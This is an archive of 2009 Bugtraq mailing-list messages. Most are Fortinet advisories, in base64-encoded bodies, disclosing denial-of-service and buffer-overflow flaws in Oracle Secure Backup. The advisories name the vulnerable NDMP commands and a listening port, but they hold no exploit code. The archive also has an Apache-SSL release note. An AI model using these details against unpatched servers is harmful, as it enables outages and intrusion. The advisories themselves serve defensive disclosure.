The Common Vulnerabilities and Exposures (CVE) project has assigned the 
names CVE-2008-4006 and CVE-2008-5448 to this issue. 


Any clarification would be appreciated.

From - Thu Jan 15 12:12:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39192-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 2E12AED949
for <lists@securityspace.com>; Thu, 15 Jan 2009 12:11:05 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D8E6B23741E; Thu, 15 Jan 2009 08:42:42 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4041 invoked from network); 15 Jan 2009 08:57:56 -0000
Message-Id: <200901150921.n0F9LdUw025523@smtp.fortinet.com>
Date: Thu, 15 Jan 2009 17:24:48 +0800
From: "noreply-secresearch@fortinet.com" <noreply-secresearch@fortinet.com>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>,
"bugtraq" <bugtraq@securityfocus.com>
Subject: Oracle Secure Backup Multiple Denial Of Service vulnerabilities
X-mailer: Foxmail 5.0 beta1 [cn]
Mime-Version: 1.0
Content-Type: text/plain;
charset="gb2312"
Content-Transfer-Encoding: base64
Status:   

T3JhY2xlIFNlY3VyZSBCYWNrdXAgTXVsdGlwbGUgRGVuaWFsIE9mIFNlcnZpY2UgdnVsbmVyYWJp
bGl0aWVzDQoyMDA5LkphbnVhcnkuMTMNCg0KRm9ydGluZXQncyBGb3J0aUd1YXJkIEdsb2JhbCBT
ZWN1cml0eSBSZXNlYXJjaCBUZWFtIERpc2NvdmVycyBtdWx0aXBsZSB2dWxuZXJhYmlsaXRpZXMg
aW4gT3JhY2xlIFNlY3VyZSBCYWNrdXANCg0KU3VtbWFyeToNCj09PT09PT09DQoNCk11bHRpcGxl
IERlbmlhbCBPZiBTZXJ2aWNlIHZ1bG5lcmFiaWxpdGllcyBleGlzdCBPcmFjbGUgU2VjdXJlIEJh
Y2t1cCAxMC4yLjAuMiB0aHJvdWdoIG1hbGZvcm1lZCBORE1QIHBhY2tldHMuDQoNCkltcGFjdDoN
Cj09PT09PT0NCg0KUmVtb3RlIERlbmlhbCBPZiBTZXJ2aWNlDQoNClJpc2s6DQo9PT09PQ0KDQpN
ZWRpdW0gKEJhc2UgU2NvcmU6NS4wKQ0KDQpBZmZlY3RlZCBTb2Z0d2FyZToNCj09PT09PT09PT09
PT09PT09PQ0KDQpPcmFjbGUgU2VjdXJlIEJhY2t1cCAxMC4yLjAuMg0KDQpBZGRpdGlvbmFsIElu
Zm9ybWF0aW9uOg0KPT09PT09PT09PT09PT09PT09PT09PT0NCg0KMT5bQ1ZFLTIwMDgtNTQ0MV1T
ZW5kaW5nIGEgbWFsZm9ybWVkIE5ETVAgY29ubmVjdCBvcGVuKE5ETVBfQ09OTkVDVF9PUEVOIGNv
bW1hbmQpIHBhY2tldCB3aWxsIGNhdXNlIGEgY3Jhc2guIA0KMj5bQ1ZFLTIwMDgtNTQ0Ml1TZW5k
aW5nIGEgbWFsZm9ybWVkIE5ETVAgY29ubmVjdCBjbG9zZShORE1QX0NPTk5FQ1RfQ0xPU0UgY29t
bWFuZCkgcGFja2V0IHdpbGwgY2F1c2UgYSBjcmFzaC4gDQozPltDVkUtMjAwOC01NDQzXVNlbmRp
bmcgYSBtYWxmb3JtZWQgTkRNUCBtb3ZlciBnZXQgc3RhdGUoTkRNUF9NT1ZFUl9HRVRfU1RBVEUg
Y29tbWFuZCkgcGFja2V0IHdpbGwgY2F1c2UgYSBjcmFzaC4gDQoNClNvbHV0aW9uczoNCj09PT09
PT09PT0NCg0KVXNlIHRoZSBzb2x1dGlvbiBwcm92aWRlZCBieSBPcmFjbGUgaHR0cDovL3d3dy5v
cmFjbGUuY29tL3RlY2hub2xvZ3kvZGVwbG95L3NlY3VyaXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0
ZXMvY3B1amFuMjAwOS5odG1sDQoNCkZvcnRpbmV0IGN1c3RvbWVycyB3aG8gc3Vic2NyaWJlIHRv
IEZvcnRpbmV0oa9zIGludHJ1c2lvbiBwcmV2ZW50aW9uIChJUFMpIHNlcnZpY2Ugc2hvdWxkIGJl
IHByb3RlY3RlZCBhZ2FpbnN0IHRoZXNlIFJlbW90ZSBEZW5pYWwgT2YNCiBTZXJ2aWNlIHZ1bG5l
cmFiaWxpdGllcy4gRm9ydGluZXShr3MgSVBTIHNlcnZpY2UgaXMgb25lIGNvbXBvbmVudCBvZiBG
b3J0aUd1YXJkIFN1YnNjcmlwdGlvbiBTZXJ2aWNlcywgd2hpY2ggYWxzbyBvZmZlciBjb21wcmVo
ZW5zaXZlIHNvbHV0aW9ucyBzdWNoIGFzIGFudGl2aXJ1cywgV2ViIGNvbnRlbnQgZmlsdGVyaW5n
IGFuZCBhbnRpc3BhbSBjYXBhYmlsaXRpZXMuIFRoZXNlIHNlcnZpY2VzIGVuYWJsZSBwcm90ZWN0
aW9uIGFnYWluc3QgdGhyZWF0cyBvbiBib3RoIGFwcGxpY2F0aW9uIGFuZCBuZXR3b3JrIGxheWVy
cy4gRm9ydGlHdWFyZCBTZXJ2aWNlcyBhcmUgY29udGludW91c2x5IHVwZGF0ZWQgYnkgdGhlIEZv
cnRpR3VhcmQgR2xvYmFsIFNlY3VyaXR5IFJlc2VhcmNoIFRlYW0sIHdoaWNoIGVuYWJsZXMgRm9y
dGluZXQgdG8gZGVsaXZlciBhIGNvbWJpbmF0aW9uIG9mIG11bHRpLWxheWVyZWQgc2VjdXJpdHkg
aW50ZWxsaWdlbmNlIGFuZCB0cnVlIHplcm8tZGF5IHByb3RlY3Rpb24gZnJvbSBuZXcgYW5kIGVt
ZXJnaW5nIHRocmVhdHMuIFRoZXNlIHVwZGF0ZXMgYXJlIGRlbGl2ZXJlZCB0byBhbGwgRm9ydGlH
YXRlLCBGb3J0aU1haWwgYW5kIEZvcnRpQ2xpZW50IHByb2R1Y3RzLiBGb3J0aW5ldCBzdHJpY3Rs
eSBmb2xsb3dzIHJlc3BvbnNpYmxlIGRpc2Nsb3N1cmUgZ3VpZGVsaW5lcyB0byBlbnN1cmUgb3B0
aW11bSBwcm90ZWN0aW9uIGR1cmluZyBhIHRocmVhdCdzIGxpZmVjeWNsZS4NCg0KQWNrbm93bGVk
Z2VtZW50Og0KPT09PT09PT09PT09PT09PQ0KDQpaaGVuaHVhbGl1IGFuZCBYaWFvcGVuZ1poYW5n
IG9mIEZvcnRpbmV0J3MgRm9ydGlHdWFyZCBHbG9iYWwgU2VjdXJpdHkgUmVzZWFyY2ggVGVhbQ0K
DQpSZWZlcmVuY2VzOg0KPT09PT09PT09PT0NCg0KaHR0cDovL3d3dy5mb3J0aWd1YXJkY2VudGVy
LmNvbS9hZHZpc29yeS9GR0EtMjAwOS0wMi5odG1sDQpodHRwOi8vd3d3Lm9yYWNsZS5jb20vdGVj
aG5vbG9neS9kZXBsb3kvc2VjdXJpdHkvY3JpdGljYWwtcGF0Y2gtdXBkYXRlcy9jcHVqYW4yMDA5
Lmh0bWwNCg0KQ1ZFIElEOiBDVkUtMjAwOC01NDQxDQpodHRwOi8vd3d3LmN2ZS5taXRyZS5vcmcv
Y2dpLWJpbi9jdmVuYW1lLmNnaT9uYW1lPTIwMDgtNTQ0MQ0KQ1ZFIElEOiBDVkUtMjAwOC01NDQy
DQpodHRwOi8vd3d3LmN2ZS5taXRyZS5vcmcvY2dpLWJpbi9jdmVuYW1lLmNnaT9uYW1lPTIwMDgt
NTQ0Mg0KQ1ZFIElEOiBDVkUtMjAwOC01NDQzDQpodHRwOi8vd3d3LmN2ZS5taXRyZS5vcmcvY2dp
LWJpbi9jdmVuYW1lLmNnaT9uYW1lPTIwMDgtNTQ0Mw0KDQoKKioqIFRoaXMgZW1haWwgYW5kIGFu
eSBhdHRhY2htZW50cyB0aGVyZXRvIG1heSBjb250YWluIHByaXZhdGUsIGNvbmZpZGVudGlhbCwg
YW5kIHByaXZpbGVnZWQgbWF0ZXJpYWwgZm9yIHRoZSBzb2xlIHVzZSBvZiB0aGUgaW50ZW5kZWQg
cmVjaXBpZW50LiAgQW55IHJldmlldywgY29weWluZywgb3IgZGlzdHJpYnV0aW9uIG9mIHRoaXMg
ZW1haWwgKG9yIGFueSBhdHRhY2htZW50cyB0aGVyZXRvKSBieSBvdGhlcnMgaXMgc3RyaWN0bHkg
cHJvaGliaXRlZC4gIElmIHlvdSBhcmUgbm90IHRoZSBpbnRlbmRlZCByZWNpcGllbnQsIHBsZWFz
ZSBjb250YWN0IHRoZSBzZW5kZXIgaW1tZWRpYXRlbHkgYW5kIHBlcm1hbmVudGx5IGRlbGV0ZSB0
aGUgb3JpZ2luYWwgYW5kIGFueSBjb3BpZXMgb2YgdGhpcyBlbWFpbCBhbmQgYW55IGF0dGFjaG1l
bnRzIHRoZXJldG8uICoqKgo
From - Thu Jan 15 12:22:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39193-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 58E6EED949
for <lists@securityspace.com>; Thu, 15 Jan 2009 12:21:48 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C8AD8237424; Thu, 15 Jan 2009 08:43:25 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4059 invoked from network); 15 Jan 2009 08:59:01 -0000
Message-Id: <200901150922.n0F9MotF026221@smtp.fortinet.com>
Date: Thu, 15 Jan 2009 17:25:58 +0800
From: "noreply-secresearch@fortinet.com" <noreply-secresearch@fortinet.com>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>,
"bugtraq" <bugtraq@securityfocus.com>
Subject: Oracle Secure Backup's observiced.exe Denial Of Service vulnerability
X-mailer: Foxmail 5.0 beta1 [cn]
Mime-Version: 1.0
Content-Type: text/plain;
charset="gb2312"
Content-Transfer-Encoding: base64
Status:   

T3JhY2xlIFNlY3VyZSBCYWNrdXAncyBvYnNlcnZpY2VkLmV4ZSBEZW5pYWwgT2YgU2VydmljZSB2
dWxuZXJhYmlsaXR5DQoyMDA5LkphbnVhcnkuMTMNCg0KRm9ydGluZXQncyBGb3J0aUd1YXJkIEds
b2JhbCBTZWN1cml0eSBSZXNlYXJjaCBUZWFtIERpc2NvdmVycyBhIHZ1bG5lcmFiaWxpdHkgaW4g
b2JzZXJ2aWNlZC5leGUgb2YgT3JhY2xlIFNlY3VyZSBCYWNrdXAgDQoNClN1bW1hcnk6DQo9PT09
PT09PQ0KDQpBIERlbmlhbCBPZiBTZXJ2aWNlIHZ1bG5lcmFiaWxpdHkgZXhpc3RzIE9yYWNsZSBT
ZWN1cmUgQmFja3VwIDEwLjIuMC4yIG9ic2VydmljZWQuZXhlIHRocm91Z2ggbWFsZm9ybWVkIHBh
Y2tldC4NCg0KSW1wYWN0Og0KPT09PT09PQ0KDQpSZW1vdGUgRGVuaWFsIE9mIFNlcnZpY2UNCg0K
UmlzazoNCj09PT09DQoNCk1lZGl1bSAoQmFzZSBTY29yZTo1LjApDQoNCkFmZmVjdGVkIFNvZnR3
YXJlOg0KPT09PT09PT09PT09PT09PT09DQoNCk9yYWNsZSBTZWN1cmUgQmFja3VwIDEwLjIuMC4y
DQoNCkFkZGl0aW9uYWwgSW5mb3JtYXRpb246DQo9PT09PT09PT09PT09PT09PT09PT09PQ0KDQpP
cmFjbGUgU2VjdXJlIEJhY2t1cCBsaXN0ZW5zLCBhbmQgcmVjZWl2ZXMgT3JhY2xlJ3MgcHJpdmF0
ZSBQcm90b2NvbCBkYXRhIGluIGEgZGVmYXVsdCBjb25maWd1cmF0aW9uLCBvbiBUQ1AgcG9ydCA0
MDANCkJ5IHNlbmRpbmcgc29tZSBtYWxmb3JtZWQgZGF0YSB0byB0aGlzIHBvcnQgd2lsbCBsZWFk
IERlbmlhbCBPZiBTZXJ2aWNlLg0KDQpTb2x1dGlvbnM6DQo9PT09PT09PT09DQoNClVzZSB0aGUg
c29sdXRpb24gcHJvdmlkZWQgYnkgT3JhY2xlIGh0dHA6Ly93d3cub3JhY2xlLmNvbS90ZWNobm9s
b2d5L2RlcGxveS9zZWN1cml0eS9jcml0aWNhbC1wYXRjaC11cGRhdGVzL2NwdWphbjIwMDkuaHRt
bA0KDQpGb3J0aW5ldCBjdXN0b21lcnMgd2hvIHN1YnNjcmliZSB0byBGb3J0aW5ldKGvcyBpbnRy
dXNpb24gcHJldmVudGlvbiAoSVBTKSBzZXJ2aWNlIHNob3VsZCBiZSBwcm90ZWN0ZWQgYWdhaW5z
dCB0aGlzIFJlbW90ZSBEZW5pYWwgT2YgU2VydmljZSANCnZ1bG5lcmFiaWxpdHkuIEZvcnRpbmV0
oa9zIElQUyBzZXJ2aWNlIGlzIG9uZSBjb21wb25lbnQgb2YgRm9ydGlHdWFyZCBTdWJzY3JpcHRp
b24gU2VydmljZXMsIHdoaWNoIGFsc28gb2ZmZXIgY29tcHJlaGVuc2l2ZSBzb2x1dGlvbnMgc3Vj
aCBhcyBhbnRpdmlydXMsIFdlYiBjb250ZW50IGZpbHRlcmluZyBhbmQgYW50aXNwYW0gY2FwYWJp
bGl0aWVzLiBUaGVzZSBzZXJ2aWNlcyBlbmFibGUgcHJvdGVjdGlvbiBhZ2FpbnN0IHRocmVhdHMg
b24gYm90aCBhcHBsaWNhdGlvbiBhbmQgbmV0d29yayBsYXllcnMuIEZvcnRpR3VhcmQgU2Vydmlj
ZXMgYXJlIGNvbnRpbnVvdXNseSB1cGRhdGVkIGJ5IHRoZSBGb3J0aUd1YXJkIEdsb2JhbCBTZWN1
cml0eSBSZXNlYXJjaCBUZWFtLCB3aGljaCBlbmFibGVzIEZvcnRpbmV0IHRvIGRlbGl2ZXIgYSBj
b21iaW5hdGlvbiBvZiBtdWx0aS1sYXllcmVkIHNlY3VyaXR5IGludGVsbGlnZW5jZSBhbmQgdHJ1
ZSB6ZXJvLWRheSBwcm90ZWN0aW9uIGZyb20gbmV3IGFuZCBlbWVyZ2luZyB0aHJlYXRzLiBUaGVz
ZSB1cGRhdGVzIGFyZSBkZWxpdmVyZWQgdG8gYWxsIEZvcnRpR2F0ZSwgRm9ydGlNYWlsIGFuZCBG
b3J0aUNsaWVudCBwcm9kdWN0cy4gRm9ydGluZXQgc3RyaWN0bHkgZm9sbG93cyByZXNwb25zaWJs
ZSBkaXNjbG9zdXJlIGd1aWRlbGluZXMgdG8gZW5zdXJlIG9wdGltdW0gcHJvdGVjdGlvbiBkdXJp
bmcgYSB0aHJlYXQncyBsaWZlY3ljbGUuDQoNCkFja25vd2xlZGdlbWVudDoNCj09PT09PT09PT09
PT09PT0NCg0KWmhlbmh1YWxpdSBhbmQgWGlhb3BlbmdaaGFuZyBvZiBGb3J0aW5ldCdzIEZvcnRp
R3VhcmQgR2xvYmFsIFNlY3VyaXR5IFJlc2VhcmNoIFRlYW0NCg0KUmVmZXJlbmNlczoNCj09PT09
PT09PT09DQoNCmh0dHA6Ly93d3cuZm9ydGlndWFyZGNlbnRlci5jb20vYWR2aXNvcnkvRkdBLTIw
MDktMDIuaHRtbA0KaHR0cDovL3d3dy5vcmFjbGUuY29tL3RlY2hub2xvZ3kvZGVwbG95L3NlY3Vy
aXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0ZXMvY3B1amFuMjAwOS5odG1sDQoNCkNWRSBJRDogQ1ZF
LTIwMDgtNTQ0NQ0KaHR0cDovL3d3dy5jdmUubWl0cmUub3JnL2NnaS1iaW4vY3ZlbmFtZS5jZ2k/
bmFtZT0yMDA4LTU0NDUNCg0K
CioqKiBUaGlzIGVtYWlsIGFuZCBhbnkgYXR0YWNobWVudHMgdGhlcmV0byBtYXkgY29udGFpbiBw
cml2YXRlLCBjb25maWRlbnRpYWwsIGFuZCBwcml2aWxlZ2VkIG1hdGVyaWFsIGZvciB0aGUgc29s
ZSB1c2Ugb2YgdGhlIGludGVuZGVkIHJlY2lwaWVudC4gIEFueSByZXZpZXcsIGNvcHlpbmcsIG9y
IGRpc3RyaWJ1dGlvbiBvZiB0aGlzIGVtYWlsIChvciBhbnkgYXR0YWNobWVudHMgdGhlcmV0bykg
Ynkgb3RoZXJzIGlzIHN0cmljdGx5IHByb2hpYml0ZWQuICBJZiB5b3UgYXJlIG5vdCB0aGUgaW50
ZW5kZWQgcmVjaXBpZW50LCBwbGVhc2UgY29udGFjdCB0aGUgc2VuZGVyIGltbWVkaWF0ZWx5IGFu
ZCBwZXJtYW5lbnRseSBkZWxldGUgdGhlIG9yaWdpbmFsIGFuZCBhbnkgY29waWVzIG9mIHRoaXMg
ZW1haWwgYW5kIGFueSBhdHRhY2htZW50cyB0aGVyZXRvLiAqKioK

From - Thu Jan 15 12:32:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f6
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39194-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 5DB8FED95B
for <lists@securityspace.com>; Thu, 15 Jan 2009 12:30:59 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 9DF16236FF2; Thu, 15 Jan 2009 08:44:04 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4088 invoked from network); 15 Jan 2009 08:59:48 -0000
Message-Id: <200901150923.n0F9NbJp026543@smtp.fortinet.com>
Date: Thu, 15 Jan 2009 17:26:45 +0800
From: "noreply-secresearch@fortinet.com" <noreply-secresearch@fortinet.com>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>,
"bugtraq" <bugtraq@securityfocus.com>
Subject: Oracle Secure Backup NDMP_CONECT_CLIENT_AUTH Command Buffer Overflow Vulnerability
X-mailer: Foxmail 5.0 beta1 [cn]
Mime-Version: 1.0
Content-Type: text/plain;
charset="gb2312"
Content-Transfer-Encoding: base64
Status:   

T3JhY2xlIFNlY3VyZSBCYWNrdXAgTkRNUF9DT05FQ1RfQ0xJRU5UX0FVVEggQ29tbWFuZCBCdWZm
ZXIgT3ZlcmZsb3cgVnVsbmVyYWJpbGl0eQ0KMjAwOS5KYW51YXJ5LjEzDQoNCkZvcnRpbmV0J3Mg
Rm9ydGlHdWFyZCBHbG9iYWwgU2VjdXJpdHkgUmVzZWFyY2ggVGVhbSBEaXNjb3ZlcnMgVnVsbmVy
YWJpbGl0eSBpbiBPcmFjbGUgU2VjdXJlIEJhY2t1cA0KDQpTdW1tYXJ5Og0KPT09PT09PT0NCg0K
QSBCdWZmZXIgT3ZlcmZsb3cgdnVsbmVyYWJpbGl0eSBleGlzdHMgT3JhY2xlIFNlY3VyZSBCYWNr
dXAgMTAuMi4wLjIgdGhyb3VnaCBhIG1hbGZvcm1lZCBORE1QIHBhY2tldC4NCg0KSW1wYWN0Og0K
PT09PT09PQ0KDQpSZW1vdGUgQ29kZSBFeGVjdXRpb24NCg0KUmlzazoNCj09PT09DQoNCkNyaXRp
Y2FsIChCYXNlIFNjb3JlOjEwLjApDQoNCkFmZmVjdGVkIFNvZnR3YXJlOg0KPT09PT09PT09PT09
PT09PT09DQoNCk9yYWNsZSBTZWN1cmUgQmFja3VwIDEwLjIuMC4yDQoNCkFkZGl0aW9uYWwgSW5m
b3JtYXRpb246DQo9PT09PT09PT09PT09PT09PT09PT09PQ0KDQpTZW5kaW5nIGEgbWFsZm9ybWVk
IE5ETVAgY2xpZW50IGF1dGhlbnRpY2F0aW9uKE5ETVBfQ09ORUNUX0NMSUVOVF9BVVRIIENvbW1h
bmQpIHBhY2tldCB3aWxsIGNhdXNlIGEgb3ZlcmZsb3cgYSBidWZmZXIgb3ZlcmZsb3cgZHVlIHRv
IA0KaW52YWxpZCBib3VuZHMgY2hlY2tpbmcuDQoNClNvbHV0aW9uczoNCj09PT09PT09PT0NCg0K
VXNlIHRoZSBzb2x1dGlvbiBwcm92aWRlZCBieSBPcmFjbGUgaHR0cDovL3d3dy5vcmFjbGUuY29t
L3RlY2hub2xvZ3kvZGVwbG95L3NlY3VyaXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0ZXMvY3B1amFu
MjAwOS5odG1sDQoNClRoZSBGb3J0aUd1YXJkIEdsb2JhbCBTZWN1cml0eSBSZXNlYXJjaCBUZWFt
IHJlbGVhc2VkIGEgc2lnbmF0dXJlICJPcmFjbGUuTkRNUC5DT05ORUNULkNMSUVOVC5BVVRILlVz
ZXIuSUQuQnVmZmVyLk92ZXJmbG93IiBvbiBKYW4gMTMgMjAwOSwgd2hpY2ggY292ZXJzIA0KdGhp
cyBzcGVjaWZpYyB2dWxuZXJhYmlsaXR5Lg0KDQpGb3J0aW5ldCBjdXN0b21lcnMgd2hvIHN1YnNj
cmliZSB0byBGb3J0aW5ldKGvcyBpbnRydXNpb24gcHJldmVudGlvbiAoSVBTKSBzZXJ2aWNlIHNo
b3VsZCBiZSBwcm90ZWN0ZWQgYWdhaW5zdCB0aGlzIFJlbW90ZSBDb2RlIEV4ZWN1dGlvbiBWdWxu
ZXJhYmlsaXR5LiBGb3J0aW5ldKGvcyBJUFMgc2VydmljZSBpcyBvbmUgY29tcG9uZW50IG9mIEZv
cnRpR3VhcmQgU3Vic2NyaXB0aW9uIFNlcnZpY2VzLCB3aGljaCBhbHNvIG9mZmVyIGNvbXByZWhl
bnNpdmUgc29sdXRpb25zIHN1Y2ggYXMgYW50aXZpcnVzLCBXZWIgY29udGVudCBmaWx0ZXJpbmcg
YW5kIGFudGlzcGFtIGNhcGFiaWxpdGllcy4gVGhlc2Ugc2VydmljZXMgZW5hYmxlIHByb3RlY3Rp
b24gYWdhaW5zdCB0aHJlYXRzIG9uIGJvdGggYXBwbGljYXRpb24gYW5kIG5ldHdvcmsgbGF5ZXJz
LiBGb3J0aUd1YXJkIFNlcnZpY2VzIGFyZSBjb250aW51b3VzbHkgdXBkYXRlZCBieSB0aGUgRm9y
dGlHdWFyZCBHbG9iYWwgU2VjdXJpdHkgUmVzZWFyY2ggVGVhbSwgd2hpY2ggZW5hYmxlcyBGb3J0
aW5ldCB0byBkZWxpdmVyIGEgY29tYmluYXRpb24gb2YgbXVsdGktbGF5ZXJlZCBzZWN1cml0eSBp
bnRlbGxpZ2VuY2UgYW5kIHRydWUgemVyby1kYXkgcHJvdGVjdGlvbiBmcm9tIG5ldyBhbmQgZW1l
cmdpbmcgdGhyZWF0cy4gVGhlc2UgdXBkYXRlcyBhcmUgZGVsaXZlcmVkIHRvIGFsbCBGb3J0aUdh
dGUsIEZvcnRpTWFpbCBhbmQgRm9ydGlDbGllbnQgcHJvZHVjdHMuIEZvcnRpbmV0IHN0cmljdGx5
IGZvbGxvd3MgcmVzcG9uc2libGUgZGlzY2xvc3VyZSBndWlkZWxpbmVzIHRvIGVuc3VyZSBvcHRp
bXVtIHByb3RlY3Rpb24gZHVyaW5nIGEgdGhyZWF0J3MgbGlmZWN5Y2xlLg0KDQpBY2tub3dsZWRn
ZW1lbnQ6DQo9PT09PT09PT09PT09PT09DQoNClpoZW5odWFsaXUgYW5kIFhpYW9wZW5nWmhhbmcg
b2YgRm9ydGluZXQncyBGb3J0aUd1YXJkIEdsb2JhbCBTZWN1cml0eSBSZXNlYXJjaCBUZWFtDQoN
ClJlZmVyZW5jZXM6DQo9PT09PT09PT09PQ0KDQpodHRwOi8vd3d3LmZvcnRpZ3VhcmRjZW50ZXIu
Y29tL2Fkdmlzb3J5L0ZHQS0yMDA5LTAyLmh0bWwNCmh0dHA6Ly93d3cub3JhY2xlLmNvbS90ZWNo
bm9sb2d5L2RlcGxveS9zZWN1cml0eS9jcml0aWNhbC1wYXRjaC11cGRhdGVzL2NwdWphbjIwMDku
aHRtbA0KDQpDVkUgSUQ6IENWRS0yMDA4LTU0NDQNCmh0dHA6Ly93d3cuY3ZlLm1pdHJlLm9yZy9j
Z2ktYmluL2N2ZW5hbWUuY2dpP25hbWU9MjAwOC01NDQ0DQoNCg0K
CioqKiBUaGlzIGVtYWlsIGFuZCBhbnkgYXR0YWNobWVudHMgdGhlcmV0byBtYXkgY29udGFpbiBw
cml2YXRlLCBjb25maWRlbnRpYWwsIGFuZCBwcml2aWxlZ2VkIG1hdGVyaWFsIGZvciB0aGUgc29s
ZSB1c2Ugb2YgdGhlIGludGVuZGVkIHJlY2lwaWVudC4gIEFueSByZXZpZXcsIGNvcHlpbmcsIG9y
IGRpc3RyaWJ1dGlvbiBvZiB0aGlzIGVtYWlsIChvciBhbnkgYXR0YWNobWVudHMgdGhlcmV0bykg
Ynkgb3RoZXJzIGlzIHN0cmljdGx5IHByb2hpYml0ZWQuICBJZiB5b3UgYXJlIG5vdCB0aGUgaW50
ZW5kZWQgcmVjaXBpZW50LCBwbGVhc2UgY29udGFjdCB0aGUgc2VuZGVyIGltbWVkaWF0ZWx5IGFu
ZCBwZXJtYW5lbnRseSBkZWxldGUgdGhlIG9yaWdpbmFsIGFuZCBhbnkgY29waWVzIG9mIHRoaXMg
ZW1haWwgYW5kIGFueSBhdHRhY2htZW50cyB0aGVyZXRvLiAqKioK

From - Thu Jan 15 12:42:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39195-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id E19EAED8CA
for <lists@securityspace.com>; Thu, 15 Jan 2009 12:40:01 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id F02BF23705B; Thu, 15 Jan 2009 08:44:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 7587 invoked from network); 15 Jan 2009 12:32:23 -0000
X-Authentication-Warning: smtp1.thebunker.net: Host 78-105-4-70.zone3.bethere.co.uk [78.105.4.70] claimed to be [10.241.6.194]
Message-ID: <496F326E.7050206@algroup.co.uk>
Date: Thu, 15 Jan 2009 12:56:14 +0000
From: Adam Laurie <adam@algroup.co.uk>
User-Agent: Thunderbird 2.0.0.18 (X11/20081125)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: ANNOUNCE: apache_1.3.41+ssl_1.60 released
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: ClamAV 0.94.2/8868/Thu Jan 15 06:34:41 2009 on irate.thebunker.net
X-Virus-Status: Clean
X-Spam-Status: No, score=0.7 required=5.0 tests=AWL,BAYES_40,RDNS_DYNAMIC,
SPF_FAIL autolearn=no version=3.2.5
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on irate.thebunker.net
Status:   

 From CHANGES.SSL:

Changed with Apache-SSL 1.3.41/1.60

   *) For some reason I switched on renegotiation, which broke
      things. For now, switched back off.
      [Ben Laurie]

The release will take a while to find it's way to mirrors, which can 
themselves be found here:

http://www.apache-ssl.org/

cheers,
Adam
-- 
Adam Laurie                         Tel: +44 (0) 20 7993 2690
